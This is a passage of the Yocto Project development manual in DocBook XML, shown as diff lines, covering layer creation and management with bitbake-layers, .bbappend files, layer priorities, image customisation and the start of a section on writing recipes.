- <listitem><para>
- <filename>common.test_layerseries_compat</filename>:
- Verifies layer compatibility is set properly.
- </para></listitem>
- <listitem><para>
- <filename>bsp.test_bsp_defines_machines</filename>:
- Tests if a BSP layer has machine configurations.
- </para></listitem>
- <listitem><para>
- <filename>bsp.test_bsp_no_set_machine</filename>:
- Tests to ensure a BSP layer does not set the
- machine when the layer is added.
- </para></listitem>
- <listitem><para>
- <filename>bsp.test_machine_world</filename>:
- Verifies that <filename>bitbake world</filename>
- works regardless of which machine is selected.
- </para></listitem>
- <listitem><para>
- <filename>bsp.test_machine_signatures</filename>:
- Verifies that building for a particular machine
- affects only the signature of tasks specific to that
- machine.
- </para></listitem>
- <listitem><para>
- <filename>distro.test_distro_defines_distros</filename>:
- Tests if a DISTRO layer has distro configurations.
- </para></listitem>
- <listitem><para>
- <filename>distro.test_distro_no_set_distros</filename>:
- Tests to ensure a DISTRO layer does not set the
- distribution when the layer is added.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='enabling-your-layer'>
- <title>Enabling Your Layer</title>
-
- <para>
- Before the OpenEmbedded build system can use your new layer,
- you need to enable it.
- To enable your layer, simply add your layer's path to the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'>BBLAYERS</ulink></filename>
- variable in your <filename>conf/bblayers.conf</filename> file,
- which is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- The following example shows how to enable a layer named
- <filename>meta-mylayer</filename>:
- <literallayout class='monospaced'>
- # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
- # changes incompatibly
- POKY_BBLAYERS_CONF_VERSION = "2"
-
- BBPATH = "${TOPDIR}"
- BBFILES ?= ""
-
- BBLAYERS ?= " \
- /home/<replaceable>user</replaceable>/poky/meta \
- /home/<replaceable>user</replaceable>/poky/meta-poky \
- /home/<replaceable>user</replaceable>/poky/meta-yocto-bsp \
- /home/<replaceable>user</replaceable>/poky/meta-mylayer \
- "
- </literallayout>
- </para>
-
- <para>
- BitBake parses each <filename>conf/layer.conf</filename> file
- from the top down as specified in the
- <filename>BBLAYERS</filename> variable
- within the <filename>conf/bblayers.conf</filename> file.
- During the processing of each
- <filename>conf/layer.conf</filename> file, BitBake adds the
- recipes, classes and configurations contained within the
- particular layer to the source directory.
- </para>
- </section>
-
- <section id='using-bbappend-files'>
- <title>Using .bbappend Files in Your Layer</title>
-
- <para>
- A recipe that appends Metadata to another recipe is called a
- BitBake append file.
- A BitBake append file uses the <filename>.bbappend</filename>
- file type suffix, while the corresponding recipe to which
- Metadata is being appended uses the <filename>.bb</filename>
- file type suffix.
- </para>
-
- <para>
- You can use a <filename>.bbappend</filename> file in your
- layer to make additions or changes to the content of another
- layer's recipe without having to copy the other layer's
- recipe into your layer.
- Your <filename>.bbappend</filename> file resides in your layer,
- while the main <filename>.bb</filename> recipe file to
- which you are appending Metadata resides in a different layer.
- </para>
-
- <para>
- Being able to append information to an existing recipe not only
- avoids duplication, but also automatically applies recipe
- changes from a different layer into your layer.
- If you were copying recipes, you would have to manually merge
- changes as they occur.
- </para>
-
- <para>
- When you create an append file, you must use the same root
- name as the corresponding recipe file.
- For example, the append file
- <filename>someapp_&DISTRO;.bbappend</filename> must apply to
- <filename>someapp_&DISTRO;.bb</filename>.
- This means the original recipe and append file names are
- version number-specific.
- If the corresponding recipe is renamed to update to a newer
- version, you must also rename and possibly update
- the corresponding <filename>.bbappend</filename> as well.
- During the build process, BitBake displays an error on starting
- if it detects a <filename>.bbappend</filename> file that does
- not have a corresponding recipe with a matching name.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_DANGLINGAPPENDS_WARNONLY'><filename>BB_DANGLINGAPPENDS_WARNONLY</filename></ulink>
- variable for information on how to handle this error.
- </para>
-
- <para>
- As an example, consider the main formfactor recipe and a
- corresponding formfactor append file both from the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- Here is the main formfactor recipe, which is named
- <filename>formfactor_0.0.bb</filename> and located in the
- "meta" layer at
- <filename>meta/recipes-bsp/formfactor</filename>:
- <literallayout class='monospaced'>
- SUMMARY = "Device formfactor information"
- SECTION = "base"
- LICENSE = "MIT"
- LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
- PR = "r45"
-
- SRC_URI = "file://config file://machconfig"
- S = "${WORKDIR}"
-
- PACKAGE_ARCH = "${MACHINE_ARCH}"
- INHIBIT_DEFAULT_DEPS = "1"
-
- do_install() {
- # Install file only if it has contents
- install -d ${D}${sysconfdir}/formfactor/
- install -m 0644 ${S}/config ${D}${sysconfdir}/formfactor/
- if [ -s "${S}/machconfig" ]; then
- install -m 0644 ${S}/machconfig ${D}${sysconfdir}/formfactor/
- fi
- } </literallayout>
- In the main recipe, note the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable, which tells the OpenEmbedded build system where to
- find files during the build.
- </para>
-
- <para>
- Following is the append file, which is named
- <filename>formfactor_0.0.bbappend</filename> and is from the
- Raspberry Pi BSP Layer named
- <filename>meta-raspberrypi</filename>.
- The file is in the layer at
- <filename>recipes-bsp/formfactor</filename>:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- </literallayout>
- </para>
-
- <para>
- By default, the build system uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable to locate files.
- This append file extends the locations by setting the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- variable.
- Setting this variable in the <filename>.bbappend</filename>
- file is the most reliable and recommended method for adding
- directories to the search path used by the build system
- to find files.
- </para>
-
- <para>
- The statement in this example extends the directories to
- include
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>,
- which resolves to a directory named
- <filename>formfactor</filename> in the same directory
- in which the append file resides (i.e.
- <filename>meta-raspberrypi/recipes-bsp/formfactor</filename>.
- This implies that you must have the supporting directory
- structure set up that will contain any files or patches you
- will be including from the layer.
- </para>
-
- <para>
- Using the immediate expansion assignment operator
- <filename>:=</filename> is important because of the reference
- to <filename>THISDIR</filename>.
- The trailing colon character is important as it ensures that
- items in the list remain colon-separated.
- <note>
- <para>
- BitBake automatically defines the
- <filename>THISDIR</filename> variable.
- You should never set this variable yourself.
- Using "_prepend" as part of the
- <filename>FILESEXTRAPATHS</filename> ensures your path
- will be searched prior to other paths in the final
- list.
- </para>
-
- <para>
- Also, not all append files add extra files.
- Many append files simply exist to add build options
- (e.g. <filename>systemd</filename>).
- For these cases, your append file would not even
- use the <filename>FILESEXTRAPATHS</filename> statement.
- </para>
- </note>
- </para>
- </section>
-
- <section id='prioritizing-your-layer'>
- <title>Prioritizing Your Layer</title>
-
- <para>
- Each layer is assigned a priority value.
- Priority values control which layer takes precedence if there
- are recipe files with the same name in multiple layers.
- For these cases, the recipe file from the layer with a higher
- priority number takes precedence.
- Priority values also affect the order in which multiple
- <filename>.bbappend</filename> files for the same recipe are
- applied.
- You can either specify the priority manually, or allow the
- build system to calculate it based on the layer's dependencies.
- </para>
-
- <para>
- To specify the layer's priority manually, use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
- variable and append the layer's root name:
- <literallayout class='monospaced'>
- BBFILE_PRIORITY_mylayer = "1"
- </literallayout>
- </para>
-
- <note>
- <para>It is possible for a recipe with a lower version number
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- in a layer that has a higher priority to take precedence.</para>
- <para>Also, the layer priority does not currently affect the
- precedence order of <filename>.conf</filename>
- or <filename>.bbclass</filename> files.
- Future versions of BitBake might address this.</para>
- </note>
- </section>
-
- <section id='managing-layers'>
- <title>Managing Layers</title>
-
- <para>
- You can use the BitBake layer management tool
- <filename>bitbake-layers</filename> to provide a view
- into the structure of recipes across a multi-layer project.
- Being able to generate output that reports on configured layers
- with their paths and priorities and on
- <filename>.bbappend</filename> files and their applicable
- recipes can help to reveal potential problems.
- </para>
-
- <para>
- For help on the BitBake layer management tool, use the
- following command:
- <literallayout class='monospaced'>
- $ bitbake-layers --help
- NOTE: Starting bitbake server...
- usage: bitbake-layers [-d] [-q] [-F] [--color COLOR] [-h] &lt;subcommand&gt; ...
-
- BitBake layers utility
-
- optional arguments:
- -d, --debug Enable debug output
- -q, --quiet Print only errors
- -F, --force Force add without recipe parse verification
- --color COLOR Colorize output (where COLOR is auto, always, never)
- -h, --help show this help message and exit
-
- subcommands:
- &lt;subcommand&gt;
- show-layers show current configured layers.
- show-overlayed list overlayed recipes (where the same recipe exists
- in another layer)
- show-recipes list available recipes, showing the layer they are
- provided by
- show-appends list bbappend files and recipe files they apply to
- show-cross-depends Show dependencies between recipes that cross layer
- boundaries.
- add-layer Add one or more layers to bblayers.conf.
- remove-layer Remove one or more layers from bblayers.conf.
- flatten flatten layer configuration into a separate output
- directory.
- layerindex-fetch Fetches a layer from a layer index along with its
- dependent layers, and adds them to conf/bblayers.conf.
- layerindex-show-depends
- Find layer dependencies from layer index.
- create-layer Create a basic layer
-
- Use bitbake-layers &lt;subcommand&gt; --help to get help on a specific command
- </literallayout>
- </para>
-
- <para>
- The following list describes the available commands:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>help:</filename></emphasis>
- Displays general help or help on a specified command.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>show-layers:</filename></emphasis>
- Shows the current configured layers.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>show-overlayed:</filename></emphasis>
- Lists overlayed recipes.
- A recipe is overlayed when a recipe with the same name
- exists in another layer that has a higher layer
- priority.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>show-recipes:</filename></emphasis>
- Lists available recipes and the layers that provide them.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>show-appends:</filename></emphasis>
- Lists <filename>.bbappend</filename> files and the
- recipe files to which they apply.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>show-cross-depends:</filename></emphasis>
- Lists dependency relationships between recipes that
- cross layer boundaries.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>add-layer:</filename></emphasis>
- Adds a layer to <filename>bblayers.conf</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>remove-layer:</filename></emphasis>
- Removes a layer from <filename>bblayers.conf</filename>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>flatten:</filename></emphasis>
- Flattens the layer configuration into a separate output
- directory.
- Flattening your layer configuration builds a "flattened"
- directory that contains the contents of all layers,
- with any overlayed recipes removed and any
- <filename>.bbappend</filename> files appended to the
- corresponding recipes.
- You might have to perform some manual cleanup of the
- flattened layer as follows:
- <itemizedlist>
- <listitem><para>
- Non-recipe files (such as patches)
- are overwritten.
- The flatten command shows a warning for these
- files.
- </para></listitem>
- <listitem><para>
- Anything beyond the normal layer
- setup has been added to the
- <filename>layer.conf</filename> file.
- Only the lowest priority layer's
- <filename>layer.conf</filename> is used.
- </para></listitem>
- <listitem><para>
- Overridden and appended items from
- <filename>.bbappend</filename> files need to be
- cleaned up.
- The contents of each
- <filename>.bbappend</filename> end up in the
- flattened recipe.
- However, if there are appended or changed
- variable values, you need to tidy these up
- yourself.
- Consider the following example.
- Here, the <filename>bitbake-layers</filename>
- command adds the line
- <filename>#### bbappended ...</filename> so that
- you know where the following lines originate:
- <literallayout class='monospaced'>
- ...
- DESCRIPTION = "A useful utility"
- ...
- EXTRA_OECONF = "--enable-something"
- ...
-
- #### bbappended from meta-anotherlayer ####
-
- DESCRIPTION = "Customized utility"
- EXTRA_OECONF += "--enable-somethingelse"
- </literallayout>
- Ideally, you would tidy up these utilities as
- follows:
- <literallayout class='monospaced'>
- ...
- DESCRIPTION = "Customized utility"
- ...
- EXTRA_OECONF = "--enable-something --enable-somethingelse"
- ...
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>layerindex-fetch</filename>:</emphasis>
- Fetches a layer from a layer index, along with its
- dependent layers, and adds the layers to the
- <filename>conf/bblayers.conf</filename> file.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>layerindex-show-depends</filename>:</emphasis>
- Finds layer dependencies from the layer index.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>create-layer</filename>:</emphasis>
- Creates a basic layer.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='creating-a-general-layer-using-the-bitbake-layers-script'>
- <title>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</title>
-
- <para>
- The <filename>bitbake-layers</filename> script with the
- <filename>create-layer</filename> subcommand simplifies
- creating a new general layer.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- For information on BSP layers, see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
- section in the Yocto Project Board Specific (BSP)
- Developer's Guide.
- </para></listitem>
- <listitem><para>
- In order to use a layer with the OpenEmbedded
- build system, you need to add the layer to your
- <filename>bblayers.conf</filename> configuration
- file.
- See the
- "<link linkend='adding-a-layer-using-the-bitbake-layers-script'>Adding a Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section for more information.
- </para></listitem>
- </itemizedlist>
- </note>
- The default mode of the script's operation with this
- subcommand is to create a layer with the following:
- <itemizedlist>
- <listitem><para>A layer priority of 6.
- </para></listitem>
- <listitem><para>A <filename>conf</filename>
- subdirectory that contains a
- <filename>layer.conf</filename> file.
- </para></listitem>
- <listitem><para>
- A <filename>recipes-example</filename> subdirectory
- that contains a further subdirectory named
- <filename>example</filename>, which contains
- an <filename>example.bb</filename> recipe file.
- </para></listitem>
- <listitem><para>A <filename >COPYING.MIT</filename>,
- which is the license statement for the layer.
- The script assumes you want to use the MIT license,
- which is typical for most layers, for the contents of
- the layer itself.
- </para></listitem>
- <listitem><para>
- A <filename>README</filename> file, which is a file
- describing the contents of your new layer.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- In its simplest form, you can use the following command form
- to create a layer.
- The command creates a layer whose name corresponds to
- <replaceable>your_layer_name</replaceable> in the current
- directory:
- <literallayout class='monospaced'>
- $ bitbake-layers create-layer <replaceable>your_layer_name</replaceable>
- </literallayout>
- As an example, the following command creates a layer named
- <filename>meta-scottrif</filename> in your home directory:
- <literallayout class='monospaced'>
- $ cd /usr/home
- $ bitbake-layers create-layer meta-scottrif
- NOTE: Starting bitbake server...
- Add your new layer with 'bitbake-layers add-layer meta-scottrif'
- </literallayout>
- </para>
-
- <para>
- If you want to set the priority of the layer to other than the
- default value of "6", you can either use the
- <filename>&dash;&dash;priority</filename> option or you can
- edit the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
- value in the <filename>conf/layer.conf</filename> after the
- script creates it.
- Furthermore, if you want to give the example recipe file
- some name other than the default, you can
- use the
- <filename>&dash;&dash;example-recipe-name</filename> option.
- </para>
-
- <para>
- The easiest way to see how the
- <filename>bitbake-layers create-layer</filename> command
- works is to experiment with the script.
- You can also read the usage information by entering the
- following:
- <literallayout class='monospaced'>
- $ bitbake-layers create-layer --help
- NOTE: Starting bitbake server...
- usage: bitbake-layers create-layer [-h] [--priority PRIORITY]
- [--example-recipe-name EXAMPLERECIPE]
- layerdir
-
- Create a basic layer
-
- positional arguments:
- layerdir Layer directory to create
-
- optional arguments:
- -h, --help show this help message and exit
- --priority PRIORITY, -p PRIORITY
- Layer directory to create
- --example-recipe-name EXAMPLERECIPE, -e EXAMPLERECIPE
- Filename of the example recipe
- </literallayout>
- </para>
- </section>
-
- <section id='adding-a-layer-using-the-bitbake-layers-script'>
- <title>Adding a Layer Using the <filename>bitbake-layers</filename> Script</title>
-
- <para>
- Once you create your general layer, you must add it to your
- <filename>bblayers.conf</filename> file.
- Adding the layer to this configuration file makes the
- OpenEmbedded build system aware of your layer so that it can
- search it for metadata.
- </para>
-
- <para>
- Add your layer by using the
- <filename>bitbake-layers add-layer</filename> command:
- <literallayout class='monospaced'>
- $ bitbake-layers add-layer <replaceable>your_layer_name</replaceable>
- </literallayout>
- Here is an example that adds a layer named
- <filename>meta-scottrif</filename> to the configuration file.
- Following the command that adds the layer is another
- <filename>bitbake-layers</filename> command that shows the
- layers that are in your <filename>bblayers.conf</filename>
- file:
- <literallayout class='monospaced'>
- $ bitbake-layers add-layer meta-scottrif
- NOTE: Starting bitbake server...
- Parsing recipes: 100% |##########################################################| Time: 0:00:49
- Parsing of 1441 .bb files complete (0 cached, 1441 parsed). 2055 targets, 56 skipped, 0 masked, 0 errors.
- $ bitbake-layers show-layers
- NOTE: Starting bitbake server...
- layer path priority
- ==========================================================================
- meta /home/scottrif/poky/meta 5
- meta-poky /home/scottrif/poky/meta-poky 5
- meta-yocto-bsp /home/scottrif/poky/meta-yocto-bsp 5
- workspace /home/scottrif/poky/build/workspace 99
- meta-scottrif /home/scottrif/poky/build/meta-scottrif 6
- </literallayout>
- Adding the layer to this file enables the build system to
- locate the layer during the build.
- <note>
- During a build, the OpenEmbedded build system looks in
- the layers from the top of the list down to the bottom
- in that order.
- </note>
- </para>
- </section>
- </section>
-
- <section id='usingpoky-extend-customimage'>
- <title>Customizing Images</title>
-
- <para>
- You can customize images to satisfy particular requirements.
- This section describes several methods and provides guidelines for each.
- </para>
-
- <section id='usingpoky-extend-customimage-localconf'>
- <title>Customizing Images Using <filename>local.conf</filename></title>
-
- <para>
- Probably the easiest way to customize an image is to add a
- package by way of the <filename>local.conf</filename>
- configuration file.
- Because it is limited to local use, this method generally only
- allows you to add packages and is not as flexible as creating
- your own customized image.
- When you add packages using local variables this way, you need
- to realize that these variable changes are in effect for every
- build and consequently affect all images, which might not
- be what you require.
- </para>
-
- <para>
- To add a package to your image using the local configuration
- file, use the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>
- variable with the <filename>_append</filename> operator:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " strace"
- </literallayout>
- Use of the syntax is important - specifically, the space between
- the quote and the package name, which is
- <filename>strace</filename> in this example.
- This space is required since the <filename>_append</filename>
- operator does not add the space.
- </para>
-
- <para>
- Furthermore, you must use <filename>_append</filename> instead
- of the <filename>+=</filename> operator if you want to avoid
- ordering issues.
- The reason for this is because doing so unconditionally appends
- to the variable and avoids ordering problems due to the
- variable being set in image recipes and
- <filename>.bbclass</filename> files with operators like
- <filename>?=</filename>.
- Using <filename>_append</filename> ensures the operation takes
- affect.
- </para>
-
- <para>
- As shown in its simplest use,
- <filename>IMAGE_INSTALL_append</filename> affects all images.
- It is possible to extend the syntax so that the variable
- applies to a specific image only.
- Here is an example:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append_pn-core-image-minimal = " strace"
- </literallayout>
- This example adds <filename>strace</filename> to the
- <filename>core-image-minimal</filename> image only.
- </para>
-
- <para>
- You can add packages using a similar approach through the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-CORE_IMAGE_EXTRA_INSTALL'>CORE_IMAGE_EXTRA_INSTALL</ulink></filename>
- variable.
- If you use this variable, only
- <filename>core-image-*</filename> images are affected.
- </para>
- </section>
-
- <section id='usingpoky-extend-customimage-imagefeatures'>
- <title>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and
- <filename>EXTRA_IMAGE_FEATURES</filename></title>
-
- <para>
- Another method for customizing your image is to enable or
- disable high-level image features by using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
- variables.
- Although the functions for both variables are nearly equivalent,
- best practices dictate using <filename>IMAGE_FEATURES</filename>
- from within a recipe and using
- <filename>EXTRA_IMAGE_FEATURES</filename> from within
- your <filename>local.conf</filename> file, which is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para>
-
- <para>
- To understand how these features work, the best reference is
- <filename>meta/classes/core-image.bbclass</filename>.
- This class lists out the available
- <filename>IMAGE_FEATURES</filename> of which most map to
- package groups while some, such as
- <filename>debug-tweaks</filename> and
- <filename>read-only-rootfs</filename>, resolve as general
- configuration settings.
- </para>
-
- <para>
- In summary, the file looks at the contents of the
- <filename>IMAGE_FEATURES</filename> variable and then maps
- or configures the feature accordingly.
- Based on this information, the build system automatically
- adds the appropriate packages or configurations to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
- variable.
- Effectively, you are enabling extra features by extending the
- class or creating a custom class for use with specialized image
- <filename>.bb</filename> files.
- </para>
-
- <para>
- Use the <filename>EXTRA_IMAGE_FEATURES</filename> variable
- from within your local configuration file.
- Using a separate area from which to enable features with
- this variable helps you avoid overwriting the features in the
- image recipe that are enabled with
- <filename>IMAGE_FEATURES</filename>.
- The value of <filename>EXTRA_IMAGE_FEATURES</filename> is added
- to <filename>IMAGE_FEATURES</filename> within
- <filename>meta/conf/bitbake.conf</filename>.
- </para>
-
- <para>
- To illustrate how you can use these variables to modify your
- image, consider an example that selects the SSH server.
- The Yocto Project ships with two SSH servers you can use
- with your images: Dropbear and OpenSSH.
- Dropbear is a minimal SSH server appropriate for
- resource-constrained environments, while OpenSSH is a
- well-known standard SSH server implementation.
- By default, the <filename>core-image-sato</filename> image
- is configured to use Dropbear.
- The <filename>core-image-full-cmdline</filename> and
- <filename>core-image-lsb</filename> images both
- include OpenSSH.
- The <filename>core-image-minimal</filename> image does not
- contain an SSH server.
- </para>
-
- <para>
- You can customize your image and change these defaults.
- Edit the <filename>IMAGE_FEATURES</filename> variable
- in your recipe or use the
- <filename>EXTRA_IMAGE_FEATURES</filename> in your
- <filename>local.conf</filename> file so that it configures the
- image you are working with to include
- <filename>ssh-server-dropbear</filename> or
- <filename>ssh-server-openssh</filename>.
- </para>
-
- <note>
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- section in the Yocto Project Reference Manual for a complete
- list of image features that ship with the Yocto Project.
- </note>
- </section>
-
- <section id='usingpoky-extend-customimage-custombb'>
- <title>Customizing Images Using Custom .bb Files</title>
-
- <para>
- You can also customize an image by creating a custom recipe
- that defines additional software as part of the image.
- The following example shows the form for the two lines you need:
- <literallayout class='monospaced'>
- IMAGE_INSTALL = "packagegroup-core-x11-base package1 package2"
-
- inherit core-image
- </literallayout>
- </para>
-
- <para>
- Defining the software using a custom recipe gives you total
- control over the contents of the image.
- It is important to use the correct names of packages in the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>
- variable.
- You must use the OpenEmbedded notation and not the Debian notation for the names
- (e.g. <filename>glibc-dev</filename> instead of <filename>libc6-dev</filename>).
- </para>
-
- <para>
- The other method for creating a custom image is to base it on an existing image.
- For example, if you want to create an image based on <filename>core-image-sato</filename>
- but add the additional package <filename>strace</filename> to the image,
- copy the <filename>meta/recipes-sato/images/core-image-sato.bb</filename> to a
- new <filename>.bb</filename> and add the following line to the end of the copy:
- <literallayout class='monospaced'>
- IMAGE_INSTALL += "strace"
- </literallayout>
- </para>
- </section>
-
- <section id='usingpoky-extend-customimage-customtasks'>
- <title>Customizing Images Using Custom Package Groups</title>
-
- <para>
- For complex custom images, the best approach for customizing
- an image is to create a custom package group recipe that is
- used to build the image or images.
- A good example of a package group recipe is
- <filename>meta/recipes-core/packagegroups/packagegroup-base.bb</filename>.
- </para>
-
- <para>
- If you examine that recipe, you see that the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'>PACKAGES</ulink></filename>
- variable lists the package group packages to produce.
- The <filename>inherit packagegroup</filename> statement
- sets appropriate default values and automatically adds
- <filename>-dev</filename>, <filename>-dbg</filename>, and
- <filename>-ptest</filename> complementary packages for each
- package specified in the <filename>PACKAGES</filename>
- statement.
- <note>
- The <filename>inherit packagegroup</filename> line should be
- located near the top of the recipe, certainly before
- the <filename>PACKAGES</filename> statement.
- </note>
- </para>
-
- <para>
- For each package you specify in <filename>PACKAGES</filename>,
- you can use
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'>RDEPENDS</ulink></filename>
- and
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'>RRECOMMENDS</ulink></filename>
- entries to provide a list of packages the parent task package
- should contain.
- You can see examples of these further down in the
- <filename>packagegroup-base.bb</filename> recipe.
- </para>
-
- <para>
- Here is a short, fabricated example showing the same basic
- pieces for a hypothetical packagegroup defined in
- <filename>packagegroup-custom.bb</filename>, where the
- variable <filename>PN</filename> is the standard way to
- abbreviate the reference to the full packagegroup name
- <filename>packagegroup-custom</filename>:
- <literallayout class='monospaced'>
- DESCRIPTION = "My Custom Package Groups"
-
- inherit packagegroup
-
- PACKAGES = "\
- ${PN}-apps \
- ${PN}-tools \
- "
-
- RDEPENDS_${PN}-apps = "\
- dropbear \
- portmap \
- psplash"
-
- RDEPENDS_${PN}-tools = "\
- oprofile \
- oprofileui-server \
- lttng-tools"
-
- RRECOMMENDS_${PN}-tools = "\
- kernel-module-oprofile"
- </literallayout>
- </para>
-
- <para>
- In the previous example, two package group packages are created with their dependencies and their
- recommended package dependencies listed: <filename>packagegroup-custom-apps</filename>, and
- <filename>packagegroup-custom-tools</filename>.
- To build an image using these package group packages, you need to add
- <filename>packagegroup-custom-apps</filename> and/or
- <filename>packagegroup-custom-tools</filename> to
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>.
- For other forms of image dependencies see the other areas of this section.
- </para>
- </section>
-
- <section id='usingpoky-extend-customimage-image-name'>
- <title>Customizing an Image Hostname</title>
-
- <para>
- By default, the configured hostname (i.e.
- <filename>/etc/hostname</filename>) in an image is the
- same as the machine name.
- For example, if
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- equals "qemux86", the configured hostname written to
- <filename>/etc/hostname</filename> is "qemux86".
- </para>
-
- <para>
- You can customize this name by altering the value of the
- "hostname" variable in the
- <filename>base-files</filename> recipe using either
- an append file or a configuration file.
- Use the following in an append file:
- <literallayout class='monospaced'>
- hostname="myhostname"
- </literallayout>
- Use the following in a configuration file:
- <literallayout class='monospaced'>
- hostname_pn-base-files = "myhostname"
- </literallayout>
- </para>
-
- <para>
- Changing the default value of the variable "hostname" can be
- useful in certain situations.
- For example, suppose you need to do extensive testing on an
- image and you would like to easily identify the image
- under test from existing images with typical default
- hostnames.
- In this situation, you could change the default hostname to
- "testme", which results in all the images using the name
- "testme".
- Once testing is complete and you do not need to rebuild the
- image for test any longer, you can easily reset the default
- hostname.
- </para>
-
- <para>
- Another point of interest is that if you unset the variable,
- the image will have no default hostname in the filesystem.
- Here is an example that unsets the variable in a
- configuration file:
- <literallayout class='monospaced'>
- hostname_pn-base-files = ""
- </literallayout>
- Having no default hostname in the filesystem is suitable for
- environments that use dynamic hostnames such as virtual
- machines.
- </para>
- </section>
- </section>
-
- <section id='new-recipe-writing-a-new-recipe'>
- <title>Writing a New Recipe</title>
-
- <para>
- Recipes (<filename>.bb</filename> files) are fundamental components
- in the Yocto Project environment.
- Each software component built by the OpenEmbedded build system
- requires a recipe to define the component.
- This section describes how to create, write, and test a new
- recipe.
- <note>
- For information on variables that are useful for recipes and
- for information about recipe naming issues, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-varlocality-recipe-required'>Required</ulink>"
- section of the Yocto Project Reference Manual.
- </note>
- </para>
-
- <section id='new-recipe-overview'>
- <title>Overview</title>
-
- <para>
- The following figure shows the basic process for creating a
- new recipe.
- The remainder of the section provides details for the steps.
- <imagedata fileref="figures/recipe-workflow.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
- </section>
-
- <section id='new-recipe-locate-or-automatically-create-a-base-recipe'>
- <title>Locate or Automatically Create a Base Recipe</title>
-
- <para>
- You can always write a recipe from scratch.
- However, three choices exist that can help you quickly get a
- start on a new recipe:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>devtool add</filename>:</emphasis>
- A command that assists in creating a recipe and
- an environment conducive to development.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>recipetool create</filename>:</emphasis>
- A command provided by the Yocto Project that automates
- creation of a base recipe based on the source
- files.
- </para></listitem>
- <listitem><para>
- <emphasis>Existing Recipes:</emphasis>
- Location and modification of an existing recipe that is
- similar in function to the recipe you need.
- </para></listitem>
- </itemizedlist>
- <note>
- For information on recipe syntax, see the
- "<link linkend='recipe-syntax'>Recipe Syntax</link>"
- section.
- </note>
- </para>
-
- <section id='new-recipe-creating-the-base-recipe-using-devtool'>
- <title>Creating the Base Recipe Using <filename>devtool add</filename></title>
-
- <para>
- The <filename>devtool add</filename> command uses the same
- logic for auto-creating the recipe as
- <filename>recipetool create</filename>, which is listed
- below.
- Additionally, however, <filename>devtool add</filename>
- sets up an environment that makes it easy for you to
- patch the source and to make changes to the recipe as
- is often necessary when adding a recipe to build a new
- piece of software to be included in a build.
- </para>
-
- <para>
- You can find a complete description of the
